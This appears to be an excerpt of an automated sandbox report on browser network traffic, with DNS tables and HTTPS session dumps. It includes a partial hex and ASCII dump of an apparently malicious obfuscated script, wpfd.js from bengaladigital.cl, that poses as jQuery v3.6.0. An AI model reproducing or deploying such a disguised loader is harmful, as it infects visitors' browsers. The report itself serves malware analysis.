Jul 5, 2024 07:58:12.633507013 CEST	53	50578	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:12.779655933 CEST	57322	53	192.168.2.4	1.1.1.1
Jul 5, 2024 07:58:12.779824972 CEST	62966	53	192.168.2.4	1.1.1.1
Jul 5, 2024 07:58:13.013294935 CEST	53	62966	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:13.016385078 CEST	53	57322	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:13.644304991 CEST	53	61856	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:14.181827068 CEST	53	64159	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:17.186631918 CEST	56811	53	192.168.2.4	1.1.1.1
Jul 5, 2024 07:58:17.186863899 CEST	54674	53	192.168.2.4	1.1.1.1
Jul 5, 2024 07:58:17.369927883 CEST	53	54674	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:17.370229006 CEST	53	56811	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:17.370743990 CEST	53	64433	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:27.008200884 CEST	53	57941	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:30.770859957 CEST	53	51913	1.1.1.1	192.168.2.4
Jul 5, 2024 07:58:36.097681046 CEST	138	138	192.168.2.4	192.168.2.255
Jul 5, 2024 07:58:49.534775019 CEST	53	60876	1.1.1.1	192.168.2.4
Jul 5, 2024 07:59:12.307293892 CEST	53	65473	1.1.1.1	192.168.2.4
Jul 5, 2024 07:59:12.403750896 CEST	53	49569	1.1.1.1	192.168.2.4
Jul 5, 2024 07:59:41.399389029 CEST	53	56502	1.1.1.1	192.168.2.4
Jul 5, 2024 08:00:28.356329918 CEST	53	50532	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jul 5, 2024 07:58:12.779655933 CEST	192.168.2.4	1.1.1.1	0x26a5	Standard query (0)	bengaladigital.cl	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:58:12.779824972 CEST	192.168.2.4	1.1.1.1	0xb757	Standard query (0)	bengaladigital.cl	65	IN (0x0001)	false
Jul 5, 2024 07:58:17.186631918 CEST	192.168.2.4	1.1.1.1	0xb7fb	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:58:17.186863899 CEST	192.168.2.4	1.1.1.1	0xffb9	Standard query (0)	www.google.com	65	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jul 5, 2024 07:58:13.016385078 CEST	1.1.1.1	192.168.2.4	0x26a5	No error (0)	bengaladigital.cl	162.241.61.68	A (IP address)	IN (0x0001)	false
Jul 5, 2024 07:58:17.369927883 CEST	1.1.1.1	192.168.2.4	0xffb9	No error (0)	www.google.com		65	IN (0x0001)	false
Jul 5, 2024 07:58:17.370229006 CEST	1.1.1.1	192.168.2.4	0xb7fb	No error (0)	www.google.com	216.58.206.36	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bengaladigital.cl

fs.microsoft.com

slscr.update.microsoft.com

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49733	162.241.61.68	443	3852	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:58:13 UTC	576	OUT	GET /wpfd.js HTTP/1.1 Host: bengaladigital.cl Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning" sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-07-05 05:58:13 UTC	270	IN	HTTP/1.1 200 OK Date: Fri, 05 Jul 2024 05:58:13 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Wed, 03 Jul 2024 09:09:26 GMT Accept-Ranges: bytes Content-Length: 355346 Vary: Accept-Encoding Content-Type: application/javascript
2024-07-05 05:58:13 UTC	7922	IN	Data Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 6a 71 75 65 72 79 2e 63 6f 6d 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 32 61 32 62 28 5f 30 78 32 61 37 39 36 34 2c 5f 30 78 34 35 31 62 32 61 29 7b 76 61 72 20 5f 30 78 33 62 62 31 61 36 3d 5f 30 78 33 62 62 31 28 29 3b 72 65 74 75 72 6e 20 5f 30 78 32 61 32 62 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 61 32 62 35 39 2c 5f 30 78 34 39 62 33 33 65 29 7b 5f 30 78 32 61 32 62 35 39 3d 5f 30 78 32 61 32 62 35 39 2d 30 78 39 61 3b 76 61 72 20 5f 30 78 33 35 31 31 30 61 3d 5f 30 78 33 62 62 31 61 36 5b 5f 30 78 32 61 32 62 35 39 5d 3b 72 65 74 75 72 6e 20 5f 30 78 33 35 31 31 30 61 3b 7d 2c 5f 30 78 32 61 32 62 28 5f 30 78 32 61 37 39 Data Ascii: /! jQuery v3.6.0 jquery.com \| jquery.org/license /function _0x2a2b(_0x2a7964,_0x451b2a){var _0x3bb1a6=_0x3bb1();return _0x2a2b=function(_0x2a2b59,_0x49b33e){_0x2a2b59=_0x2a2b59-0x9a;var _0x35110a=_0x3bb1a6[_0x2a2b59];return _0x35110a;},_0x2a2b(_0x2a79
2024-07-05 05:58:13 UTC	8000	IN	Data Raw: 77 69 62 76 53 76 55 4f 62 41 43 63 35 56 48 45 75 4c 50 75 43 56 63 5a 33 78 67 53 72 67 54 7a 33 54 38 47 32 6e 70 48 55 73 56 70 6e 6d 4f 52 79 61 74 55 6b 38 35 66 33 4d 45 48 4e 4b 68 39 7a 55 42 70 32 44 67 34 68 66 62 37 63 31 74 50 4b 56 49 51 33 30 57 57 79 61 44 58 4a 47 55 6f 76 51 52 41 50 6a 63 42 6f 2f 52 78 37 4a 5a 43 52 43 31 63 51 66 46 74 64 4a 65 59 46 4e 6f 33 79 4e 2f 56 4e 68 37 4b 52 73 34 57 7a 71 74 36 54 53 38 73 34 35 35 6c 78 72 76 2f 4c 51 70 63 32 76 52 46 58 72 4f 41 5a 6a 62 4e 51 78 6a 59 77 71 50 73 56 6d 64 32 43 38 53 58 4f 37 45 2b 37 69 61 70 7a 70 42 4d 44 79 72 41 78 52 35 35 44 39 67 79 6e 4a 36 55 70 2f 46 64 52 6e 65 39 77 30 4c 61 66 4e 35 6e 63 54 41 62 36 54 72 75 4d 4b 46 74 68 6c 64 75 52 49 2f 46 43 68 37 Data Ascii: wibvSvUObACc5VHEuLPuCVcZ3xgSrgTz3T8G2npHUsVpnmORyatUk85f3MEHNKh9zUBp2Dg4hfb7c1tPKVIQ30WWyaDXJGUovQRAPjcBo/Rx7JZCRC1cQfFtdJeYFNo3yN/VNh7KRs4Wzqt6TS8s455lxrv/LQpc2vRFXrOAZjbNQxjYwqPsVmd2C8SXO7E+7iapzpBMDyrAxR55D9gynJ6Up/FdRne9w0LafN5ncTAb6TruMKFthlduRI/FCh7
2024-07-05 05:58:13 UTC	8000	IN	Data Raw: 41 73 56 73 79 2b 39 57 35 49 65 31 39 61 6b 4d 4b 31 4b 59 54 75 64 47 69 57 4b 76 54 75 6d 2b 73 6a 4f 4e 73 4c 66 47 44 44 56 59 42 67 6c 4c 6b 55 4c 43 35 69 4c 33 4f 37 46 37 4f 56 62 30 43 57 55 66 63 69 6e 62 48 63 46 57 49 36 51 77 52 64 51 6c 52 6d 2b 31 46 64 6a 41 73 43 30 32 6f 63 49 4d 47 66 74 37 58 7a 63 63 67 47 42 4a 6a 41 52 6f 64 36 7a 70 4a 66 4c 76 44 6d 38 4b 66 46 6f 4b 78 43 59 2b 2f 4b 58 46 41 2f 6a 41 39 62 46 51 77 64 2b 6b 38 43 63 72 70 46 44 78 61 4d 75 43 68 62 30 43 4b 70 36 6f 38 4c 45 38 2f 2f 79 41 39 2b 4e 2f 2b 48 68 33 33 41 52 6d 72 76 76 39 39 36 75 6a 51 44 4b 6c 4f 79 72 5a 57 6f 4b 65 48 57 58 73 2b 44 7a 34 4c 4f 63 78 61 6e 47 75 46 39 54 41 50 4f 77 44 6c 73 31 42 6d 53 4d 43 65 32 6f 2f 6a 64 2b 41 30 41 61 Data Ascii: AsVsy+9W5Ie19akMK1KYTudGiWKvTum+sjONsLfGDDVYBglLkULC5iL3O7F7OVb0CWUfcinbHcFWI6QwRdQlRm+1FdjAsC02ocIMGft7XzccgGBJjARod6zpJfLvDm8KfFoKxCY+/KXFA/jA9bFQwd+k8CcrpFDxaMuChb0CKp6o8LE8//yA9+N/+Hh33ARmrvv996ujQDKlOyrZWoKeHWXs+Dz4LOcxanGuF9TAPOwDls1BmSMCe2o/jd+A0Aa
2024-07-05 05:58:13 UTC	8000	IN	Data Raw: 7a 75 46 58 6a 39 53 59 59 4c 61 50 72 6d 63 63 73 47 69 77 53 33 64 5a 52 4e 39 4d 44 47 66 79 47 50 68 5a 4a 2b 6a 67 57 7a 65 66 6b 30 6b 50 53 33 30 44 59 50 35 66 58 2f 33 30 65 49 4a 69 46 68 50 73 75 78 54 7a 39 55 32 50 6a 65 38 76 76 37 45 6e 4b 37 70 76 56 45 51 37 50 71 54 74 72 34 44 4b 41 6f 63 57 4b 76 6a 31 54 34 68 50 7a 73 47 76 57 74 78 78 74 74 72 2b 6b 7a 66 67 6a 56 2f 53 69 32 55 48 78 39 43 39 47 41 47 66 46 43 34 67 41 34 48 56 44 39 53 57 50 55 78 79 35 59 34 6a 6f 36 6b 2f 36 6e 38 79 79 41 63 74 74 42 69 78 74 45 5a 4d 62 77 64 64 6e 47 6e 74 64 4e 33 6a 61 35 75 4c 34 67 63 45 47 4f 44 68 43 6f 7a 50 2f 35 78 63 76 33 75 2f 4b 66 44 5a 4b 57 44 78 4d 35 79 6b 66 6b 78 37 4a 6f 50 38 64 55 2f 78 31 4d 4f 6a 63 52 51 65 38 71 50 Data Ascii: zuFXj9SYYLaPrmccsGiwS3dZRN9MDGfyGPhZJ+jgWzefk0kPS30DYP5fX/30eIJiFhPsuxTz9U2Pje8vv7EnK7pvVEQ7PqTtr4DKAocWKvj1T4hPzsGvWtxxttr+kzfgjV/Si2UHx9C9GAGfFC4gA4HVD9SWPUxy5Y4jo6k/6n8yyActtBixtEZMbwddnGntdN3ja5uL4gcEGODhCozP/5xcv3u/KfDZKWDxM5ykfkx7JoP8dU/x1MOjcRQe8qP
2024-07-05 05:58:13 UTC	8000	IN	Data Raw: 54 31 58 4d 4a 79 44 77 36 71 62 38 4d 50 59 6f 50 73 79 6e 4a 66 67 70 69 74 46 33 6e 49 39 72 2f 6a 75 4c 48 46 37 73 6d 48 66 4e 7a 74 63 2b 55 54 45 45 2b 36 55 42 48 47 37 38 4f 68 6e 42 6e 34 70 6a 50 77 4b 79 7a 32 77 71 75 72 33 54 45 71 30 36 30 76 30 2b 36 2f 57 64 73 54 67 64 49 6d 7a 6e 30 37 52 4e 59 31 79 39 56 75 50 4c 6e 4c 67 47 35 54 6a 6e 39 6f 6f 6a 42 36 6a 4e 74 51 74 78 71 4b 45 4d 51 39 72 76 62 2f 4c 47 4c 45 37 6d 5a 68 4a 58 6b 37 7a 6d 35 39 32 76 6b 39 50 48 2f 72 35 7a 79 44 4e 6d 4b 54 48 42 44 67 33 72 74 34 73 78 4a 49 6a 77 4b 55 35 38 77 69 72 72 66 48 65 69 6f 7a 62 69 70 73 61 54 31 43 2b 46 69 57 61 54 34 61 47 6a 55 4d 63 67 58 75 57 6a 2f 32 5a 46 62 79 52 33 38 2b 70 54 76 44 73 5a 31 47 39 55 5a 50 36 6d 65 51 33 Data Ascii: T1XMJyDw6qb8MPYoPsynJfgpitF3nI9r/juLHF7smHfNztc+UTEE+6UBHG78OhnBn4pjPwKyz2wqur3TEq060v0+6/WdsTgdImzn07RNY1y9VuPLnLgG5Tjn9oojB6jNtQtxqKEMQ9rvb/LGLE7mZhJXk7zm592vk9PH/r5zyDNmKTHBDg3rt4sxJIjwKU58wirrfHeiozbipsaT1C+FiWaT4aGjUMcgXuWj/2ZFbyR38+pTvDsZ1G9UZP6meQ3
2024-07-05 05:58:13 UTC	8000	IN	Data Raw: 6e 36 4a 36 70 58 4e 6e 6b 72 32 76 76 69 6e 77 4d 31 47 67 78 6f 6d 35 31 7a 47 44 4e 63 34 52 4f 32 66 53 71 42 59 72 73 75 41 77 2b 74 52 76 57 64 67 34 47 6f 4e 59 64 4c 71 77 4c 46 71 73 4e 33 74 74 39 69 45 2f 45 34 4e 2b 4f 6c 7a 76 52 57 35 4a 6c 74 4c 2f 71 65 48 4c 4a 75 4b 43 32 71 2f 34 6c 67 31 41 54 78 55 75 4a 41 41 6f 71 42 38 51 62 73 44 64 59 63 44 78 37 42 70 62 38 53 36 68 37 69 6d 53 68 6b 73 73 4b 59 76 64 70 64 33 64 66 68 37 67 30 4d 38 53 31 72 58 63 33 4d 78 2f 5a 39 6d 62 73 74 56 48 32 73 4f 51 4d 75 74 32 63 72 48 68 39 52 79 36 41 2b 41 43 4d 4c 6c 63 39 73 67 42 55 6a 2b 48 6b 55 57 76 49 64 62 43 36 34 54 79 50 50 48 62 31 36 4e 30 4c 6c 59 44 46 4b 72 52 78 75 66 31 75 30 56 5a 31 4d 36 34 32 6d 5a 2b 51 4f 4e 4c 6e 44 42 Data Ascii: n6J6pXNnkr2vvinwM1Ggxom51zGDNc4RO2fSqBYrsuAw+tRvWdg4GoNYdLqwLFqsN3tt9iE/E4N+OlzvRW5JltL/qeHLJuKC2q/4lg1ATxUuJAAoqB8QbsDdYcDx7Bpb8S6h7imShkssKYvdpd3dfh7g0M8S1rXc3Mx/Z9mbstVH2sOQMut2crHh9Ry6A+ACMLlc9sgBUj+HkUWvIdbC64TyPPHb16N0LlYDFKrRxuf1u0VZ1M642mZ+QONLnDB
2024-07-05 05:58:13 UTC	8000	IN	Data Raw: 63 53 43 39 33 42 7a 6d 34 2b 50 61 77 43 50 6d 66 4d 42 61 62 78 5a 6a 76 43 4f 52 62 73 67 50 58 67 74 58 6c 57 79 53 61 32 55 71 64 4c 51 54 58 6e 76 41 4d 64 72 51 4e 36 38 48 31 30 55 6d 6c 68 7a 64 68 49 57 4c 46 62 35 44 49 6b 42 32 37 46 73 35 34 76 73 6c 70 77 56 79 4a 6b 34 36 6f 54 6c 75 74 75 59 62 6a 4b 45 54 6e 72 36 4f 66 51 33 32 31 2f 4d 33 43 56 6e 32 50 51 38 36 2f 79 2f 2f 78 2f 2b 72 4e 46 73 53 31 55 42 4f 45 39 68 72 51 6d 73 73 78 45 6c 77 49 6d 59 52 38 45 77 47 5a 47 4c 49 45 4f 5a 45 45 57 38 6b 53 5a 42 43 69 48 52 54 4f 4f 61 73 52 4f 38 53 30 2f 78 30 42 5a 36 67 30 43 63 71 55 4b 7a 77 4a 41 42 74 6b 4f 4f 4a 69 35 6f 34 77 5a 62 37 70 4c 51 42 4c 69 66 47 44 4f 66 41 50 52 52 6f 37 71 44 6a 4b 59 70 66 5a 6a 59 49 78 51 6d Data Ascii: cSC93Bzm4+PawCPmfMBabxZjvCORbsgPXgtXlWySa2UqdLQTXnvAMdrQN68H10UmlhzdhIWLFb5DIkB27Fs54vslpwVyJk46oTlutuYbjKETnr6OfQ321/M3CVn2PQ86/y//x/+rNFsS1UBOE9hrQmssxElwImYR8EwGZGLIEOZEEW8kSZBCiHRTOOasRO8S0/x0BZ6g0CcqUKzwJABtkOOJi5o4wZb7pLQBLifGDOfAPRRo7qDjKYpfZjYIxQm
2024-07-05 05:58:13 UTC	8000	IN	Data Raw: 4a 35 2f 6f 6a 51 72 36 67 39 72 5a 33 4d 68 43 45 59 4d 6a 51 4f 57 47 48 4e 53 51 4a 7a 45 5a 55 5a 4f 70 48 68 4d 57 72 47 48 6c 50 54 2f 67 4a 64 5a 79 43 45 32 34 44 2b 50 32 59 70 6b 4c 49 72 75 68 4e 4f 34 4f 4a 35 37 53 44 62 44 72 74 65 47 59 6e 44 64 7a 46 75 37 73 46 36 50 71 35 57 47 6b 77 44 42 6a 4f 51 78 34 78 44 62 70 6c 64 62 6b 39 56 6a 4c 44 45 4d 55 66 59 52 50 34 67 38 38 76 4d 55 72 62 6b 44 42 6a 4f 2b 66 72 34 51 5a 2f 35 32 33 74 47 45 2b 6c 33 4b 42 67 36 32 66 4a 6c 4e 78 70 69 37 6d 79 6a 2b 61 63 62 4d 73 59 4c 74 71 35 39 6e 41 75 33 79 42 2f 62 65 54 44 7a 43 2b 31 6b 65 41 47 70 58 41 75 75 73 34 37 78 68 51 66 49 74 76 4b 30 33 59 55 52 59 73 44 39 65 50 6f 39 61 6f 59 31 6f 6c 73 42 61 66 78 35 6a 66 32 41 4f 76 42 58 79 Data Ascii: J5/ojQr6g9rZ3MhCEYMjQOWGHNSQJzEZUZOpHhMWrGHlPT/gJdZyCE24D+P2YpkLIruhNO4OJ57SDbDrteGYnDdzFu7sF6Pq5WGkwDBjOQx4xDbpldbk9VjLDEMUfYRP4g88vMUrbkDBjO+fr4QZ/523tGE+l3KBg62fJlNxpi7myj+acbMsYLtq59nAu3yB/beTDzC+1keAGpXAuus47xhQfItvK03YURYsD9ePo9aoY1olsBafx5jf2AOvBXy
2024-07-05 05:58:13 UTC	8000	IN	Data Raw: 4a 6e 65 70 73 38 6f 58 4b 6d 45 5a 35 47 43 6f 55 44 4d 58 44 4a 4c 34 58 57 48 52 38 4c 2f 68 72 44 68 57 74 73 4e 50 2b 4c 31 37 79 6d 46 6e 35 30 2b 4c 6f 68 2f 78 57 47 36 36 30 38 2f 35 53 56 77 74 67 70 36 4b 50 30 63 5a 58 45 59 77 65 54 4f 69 38 55 65 61 46 56 58 58 64 77 6e 53 70 47 2b 7a 56 51 36 32 6b 2b 2f 71 62 78 7a 4d 31 2b 55 64 33 41 74 6f 50 32 44 54 53 42 43 30 44 74 33 2f 64 4f 6a 6e 67 6d 43 48 2f 61 47 36 30 35 70 59 69 79 50 33 58 55 46 39 4b 34 71 2f 31 62 42 36 6d 47 78 58 4f 2b 6d 4e 42 51 38 63 67 61 56 64 2f 4c 67 76 5a 53 46 41 38 6a 32 33 39 6d 67 41 57 31 4e 6a 7a 68 4d 64 44 6f 61 66 43 51 4c 4c 31 6d 52 75 35 2f 4b 54 73 59 56 7a 44 57 39 2b 7a 51 37 54 54 38 5a 33 2f 73 6b 5a 48 67 71 44 32 6c 43 34 61 30 69 73 38 77 4f Data Ascii: Jneps8oXKmEZ5GCoUDMXDJL4XWHR8L/hrDhWtsNP+L17ymFn50+Loh/xWG6608/5SVwtgp6KP0cZXEYweTOi8UeaFVXXdwnSpG+zVQ62k+/qbxzM1+Ud3AtoP2DTSBC0Dt3/dOjngmCH/aG605pYiyP3XUF9K4q/1bB6mGxXO+mNBQ8cgaVd/LgvZSFA8j239mgAW1NjzhMdDoafCQLL1mRu5/KTsYVzDW9+zQ7TT8Z3/skZHgqD2lC4a0is8wO
2024-07-05 05:58:13 UTC	8000	IN	Data Raw: 2b 48 4c 63 66 67 62 2b 75 71 62 4f 58 65 4f 6c 65 61 47 6f 30 62 7a 75 77 69 6a 58 38 4c 51 78 34 65 64 65 67 39 47 73 38 42 52 4c 72 72 6e 57 57 4c 6d 56 72 6f 32 68 68 54 77 32 68 74 77 32 7a 52 5a 52 63 4d 7a 51 59 63 77 7a 72 6e 41 73 6e 38 35 34 37 44 4c 6a 76 76 65 4f 4d 62 4a 47 34 63 6d 59 35 33 4f 63 5a 38 37 48 57 6c 68 2f 5a 7a 74 48 6e 5a 61 73 49 62 70 73 49 43 4a 37 59 4e 38 59 74 51 66 33 76 64 34 34 66 6d 4b 65 65 6f 58 31 37 62 70 32 4a 43 34 66 4f 46 2f 31 6e 35 41 48 42 4f 45 50 71 45 65 4e 44 44 4a 4b 77 58 45 74 53 50 5a 67 45 46 69 36 70 6c 59 62 4e 74 6f 55 4a 6b 39 79 37 2f 4e 50 39 35 66 31 2b 47 74 78 32 6e 63 52 34 4a 66 2f 65 4c 31 52 59 52 6f 6f 69 6c 67 79 58 64 5a 49 6a 59 68 55 6b 4c 35 6c 6f 64 64 7a 68 32 32 71 4f 35 6b Data Ascii: +HLcfgb+uqbOXeOleaGo0bzuwijX8LQx4edeg9Gs8BRLrrnWWLmVro2hhTw2htw2zRZRcMzQYcwzrnAsn8547DLjvveOMbJG4cmY53OcZ87HWlh/ZztHnZasIbpsICJ7YN8YtQf3vd44fmKeeoX17bp2JC4fOF/1n5AHBOEPqEeNDDJKwXEtSPZgEFi6plYbNtoUJk9y7/NP95f1+Gtx2ncR4Jf/eL1RYRooilgyXdZIjYhUkL5loddzh22qO5k

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49741	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:58:18 UTC	161	OUT	HEAD /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-05 05:58:18 UTC	467	IN	HTTP/1.1 200 OK Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=209549 Date: Fri, 05 Jul 2024 05:58:18 GMT Connection: close X-CID: 2

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49742	184.28.90.27	443

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:58:19 UTC	239	OUT	GET /fs/windows/config.json HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Encoding: identity If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT Range: bytes=0-2147483646 User-Agent: Microsoft BITS/7.8 Host: fs.microsoft.com
2024-07-05 05:58:19 UTC	515	IN	HTTP/1.1 200 OK ApiVersion: Distribute 1.1 Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json Content-Type: application/octet-stream ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7" Last-Modified: Tue, 16 May 2017 22:58:00 GMT Server: ECAcc (lpl/EF06) X-CID: 11 X-Ms-ApiVersion: Distribute 1.2 X-Ms-Region: prod-weu-z1 Cache-Control: public, max-age=209564 Date: Fri, 05 Jul 2024 05:58:19 GMT Content-Length: 55 Connection: close X-CID: 2
2024-07-05 05:58:19 UTC	55	IN	Data Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49747	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:58:31 UTC	306	OUT	GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C8Pm4s9BsHOlOsb&MD=NO+3KBGm HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-05 05:58:31 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880" MS-CorrelationId: 21e5336f-9dea-413b-a17a-bdf2dc0d1531 MS-RequestId: 6cecf4d6-ca97-4b40-9c98-64f243002b5a MS-CV: jGlxuixrtUeATlje.0 X-Microsoft-SLSClientCache: 2880 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 05 Jul 2024 05:58:30 GMT Connection: close Content-Length: 24490
2024-07-05 05:58:31 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 92 1e 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 23 d0 00 00 14 00 00 00 00 00 10 00 92 1e 00 00 18 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 e6 42 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 78 cf 8d 5c 26 1e e6 42 43 4b ed 5c 07 54 13 db d6 4e a3 f7 2e d5 d0 3b 4c 42 af 4a 57 10 e9 20 bd 77 21 94 80 88 08 24 2a 02 02 d2 55 10 a4 a8 88 97 22 8a 0a d2 11 04 95 ae d2 8b 20 28 0a 88 20 45 05 f4 9f 80 05 bd ed dd f7 ff 77 dd f7 bf 65 d6 4a 66 ce 99 33 67 4e d9 7b 7f fb db 7b 56 f4 4d 34 b4 21 e0 a7 03 0a d9 fc 68 6e 1d 20 70 28 14 02 85 20 20 ad 61 10 08 e3 66 0d ed 66 9b 1d 6a 90 af 1f 17 f0 4b 68 35 01 83 6c fb 44 42 5c 7d 83 3d 03 30 be 3e ae be 58 Data Ascii: MSCFD#AdBenvironment.cabx\&BCK\TN.;LBJW w!$*U" ( EweJf3gN{{VM4!hn p( affjKh5lDB\}=0>X
2024-07-05 05:58:31 UTC	8666	IN	Data Raw: 04 01 31 2f 30 2d 30 0a 02 05 00 e1 2b 8a 50 02 01 00 30 0a 02 01 00 02 02 12 fe 02 01 ff 30 07 02 01 00 02 02 11 e6 30 0a 02 05 00 e1 2c db d0 02 01 00 30 36 06 0a 2b 06 01 04 01 84 59 0a 04 02 31 28 30 26 30 0c 06 0a 2b 06 01 04 01 84 59 0a 03 02 a0 0a 30 08 02 01 00 02 03 07 a1 20 a1 0a 30 08 02 01 00 02 03 01 86 a0 30 0d 06 09 2a 86 48 86 f7 0d 01 01 05 05 00 03 81 81 00 0c d9 08 df 48 94 57 65 3e ad e7 f2 17 9c 1f ca 3d 4d 6c cd 51 e1 ed 9c 17 a5 52 35 0f fd de 4b bd 22 92 c5 69 e5 d7 9f 29 23 72 40 7a ca 55 9d 8d 11 ad d5 54 00 bb 53 b4 87 7b 72 84 da 2d f6 e3 2c 4f 7e ba 1a 58 88 6e d6 b9 6d 16 ae 85 5b b5 c2 81 a8 e0 ee 0a 9c 60 51 3a 7b e4 61 f8 c3 e4 38 bd 7d 28 17 d6 79 f0 c8 58 c6 ef 1f f7 88 65 b1 ea 0a c0 df f7 ee 5c 23 c2 27 fd 98 63 08 31 Data Ascii: 1/0-0+P000,06+Y1(0&0+Y0 00*HHWe>=MlQR5K"i)#r@zUTS{r-,O~Xnm[`Q:{a8}(yXe\#'c1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49756	40.68.123.157	443

Timestamp	Bytes transferred	Direction	Data
2024-07-05 05:59:09 UTC	306	OUT	GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=C8Pm4s9BsHOlOsb&MD=NO+3KBGm HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33 Host: slscr.update.microsoft.com
2024-07-05 05:59:10 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440" MS-CorrelationId: 51299498-a459-4d59-82b1-ca13d5259abd MS-RequestId: 41e09cf4-1122-4740-af88-6fcb037520f3 MS-CV: PFX2PHnurUe5etAF.0 X-Microsoft-SLSClientCache: 1440 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Fri, 05 Jul 2024 05:59:09 GMT Connection: close Content-Length: 30005
